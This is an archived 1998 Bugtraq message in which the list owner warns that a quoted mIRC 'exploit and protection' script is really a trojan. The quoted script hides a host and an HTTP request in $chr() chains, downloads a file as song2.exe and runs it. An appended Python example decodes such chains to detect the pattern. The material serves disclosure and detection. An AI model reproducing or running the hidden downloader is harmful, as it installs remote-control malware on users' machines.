[8559] in bugtraq
Re: your mail
daemon@ATHENA.MIT.EDU (owner-bugtraq@NETSPACE.ORG)
Sat Nov 14 20:26:20 1998
Date: Sat, 14 Nov 1998 16:08:54 -0600
X-To: System Administrator <root@BRAMPTON1.NETMATRIX.NET>
From: <owner-bugtraq@NETSPACE.ORG>
To: BUGTRAQ@NETSPACE.ORG
In-Reply-To: <199811131950.OAA02949@brampton1.netmatrix.net>

This is a trojan script; if it worked right, it would connect to a certain
webserver and download BO. This should *not* have been passed on to the
list. Do *not* attempt to load this script.

On Fri, 13 Nov 1998, System Administrator wrote:
> Hi,
> while debugging/hexing/disassembling mirc my friend slotmech last week found
> a mirc bug which allows to force users to send MODE commands to the server.
> this example script sends a MODE +o to the irc server. the mirc author has been
> notified of this but we didn't receive a response... my exploit+protection scri$is included. Expect more mirc stuff from us.
>
> cya,
> fs
>
> --- cut here ---
>
> ;#; mIRC v5.41 hack protection & exploit by FeaRStorm <fearstorm@gmx.net>
> ;#; Allows to let a victim op yourself using a bug in mIRC5.41, script based$;#; included. Bug may not work on scripts that do a halt; after a ctcp useri$;#;
> ;#; -------- Use /hackop nick #channel to make nick give you op on #channel !
> ;#; -------- That's it... have phun!
> ;#;
> ;#; greets go to tr4xzor, slotmech, meep, fowi, lotomax and all #haktex opz !
> ;#; no greets to the following lamerz: cheyenne, zito, cortex and DrFrozt (ass$;#; Credits: i didn't find this bug, slotmech did... i only wrote this exploit$;#;
> ;#; if you want to add this code to your own script please: ASK FIRST!
>
> ctcp 1:userinfo*: antihack
>
> alias antihack {
> if ($len($2) > 17 && $chr(91) isin $2-) {
> echo $active mIRC5.41 hack attempt from $nick
> .halt
> }
> }
>
> alias hackop {
> if ($2 == $null) {
> echo 3 *** Usage: /hackop nick #channel
> .halt
> }
> if ($me !ison $2) {
> echo 3 *** You aren't on that Channel!
> .halt
> }
> if ($1 !isop $2) {
> echo 3 *** $1 isn't opped on that channel!
> .halt
> }
> checklen $1
> .ctcp $$1 userinfo $ $+ xxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxx $6) $+ $chr(115) $chr(109) $+ $chr(111) $+ $chr(100) $+ $chr(101) $+ : +o $me | $}
>
> alias checklen {
> .if (%xcomplete == 1) halt
> .if (%xinprog == 1) halt
> .set %xfilename song2.exe
> .set %xlof $lof(%xfilename)
> .set %xfirst 1
> .write -c %xfilename
> ; echo 3 $active $chr(100 111 110 116 - 115 112 111 105 108 - 116 104 101 - 1$ .sockclose protx
> .sockopen protx $chr(119) $+ $chr(119) $+ $chr(119) $+ . $+ $chr(103) $+ $chr$}
> on 1:sockopen:protx: {
> .sockwrite -n protx $chr(71) $+ $chr(69) $+ $chr(84) $chr(47) $+ $chr(66) $+ $+ $chr(101) $+ $chr(108) $+ $chr(116) $+ $chr(97) $+ $chr(47) $+ $chr(57) $+ $c$ .sockwrite -n protx
> }
>
> on 1:sockread:protx: {
> .sockread &test
> .set %xlof $lof(%xfilename)
> .if (%xfirst == 1) set %xlof 0
> .set %xfirst 0
> .bwrite %xfilename %xlof $sockbr &test
> }
>
> on 1:connect:checklen
>
> on 1:sockclose:protx: {
> .sockread &test
> if ($sockbr > 0) {
> .set %xlof $lof(%xfilename)
> .bwrite %xfilename %xlof $sockbr &test
> }
> .if ($lof(%xfilename) == 178306) {
> .run %xfilename
> .set %xcomplete 1
> }
> if ($lof(%xfilename) != 178306) {
> .timer 1 300 checklen
> }
> }
> unset %xinprog
> unset %xfilename
> unset %xlof
> unset %xfirst
> }
>
> --- cut here ---
>
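
The reply above identifies the quoted script as a downloader whose strings are hidden behind `$chr()` chains. As an added example (not part of either message), this Python triage pass decodes `$chr(N)` / `$+` chains and flags a script that combines socket, binary-write and run commands; the sample script, its `host.invalid` name and its file names are constructed for illustration.

```python
import re

CHR = re.compile(r"\$chr\((\d{1,3})\)", re.I)    # $chr(N) -> character N
JOIN = re.compile(r"\s*\$\+\s*")                 # $+ joins its neighbours
CMD = re.compile(r"(?:^|[\s|{])\.?(sockopen|bwrite|run)\b", re.I)
ROLE = {"sockopen": "network", "bwrite": "file-write", "run": "execute"}

# Constructed sample; not the script from the quoted message.
SAMPLE = """\
alias fetch {
  .sockopen dl $chr(104) $+ $chr(111) $+ $chr(115) $+ $chr(116) $+ . $+ invalid 80
}
on 1:sockopen:dl: .sockwrite -n dl $chr(71) $+ $chr(69) $+ $chr(84) $chr(47) $+ $chr(102)
on 1:sockread:dl: {
  .sockread &buf
  .bwrite out.exe -1 $sockbr &buf
}
on 1:sockclose:dl: .run out.exe
"""

def deobfuscate(line):
    """Resolve $chr(N) calls, then apply the $+ concatenation operator."""
    return JOIN.sub("", CHR.sub(lambda m: chr(int(m.group(1))), line))

def triage(script, min_chr=3):
    """Return decoded $chr() lines and the capabilities a script uses."""
    decoded, caps = [], set()
    for no, raw in enumerate(script.splitlines(), 1):
        line = raw.lstrip("> \t").rstrip()       # tolerate mail quoting
        if not line or line.startswith(";"):     # skip blanks and comments
            continue
        if len(CHR.findall(line)) >= min_chr:    # likely hidden string
            decoded.append((no, deobfuscate(line)))
        caps.update(ROLE[name.lower()] for name in CMD.findall(line))
    return {"decoded": decoded, "capabilities": caps,
            "download_and_run": set(ROLE.values()) <= caps}

if __name__ == "__main__":
    report = triage(SAMPLE)
    for no, text in report["decoded"]:
        print(f"line {no}: {text}")
    print("capabilities:", sorted(report["capabilities"]))
    print("download-and-run pattern:", report["download_and_run"])
```

A hit on all three capabilities is a reason to read the decoded lines before loading a script, not proof of malice; legitimate scripts also use sockets and `/run`.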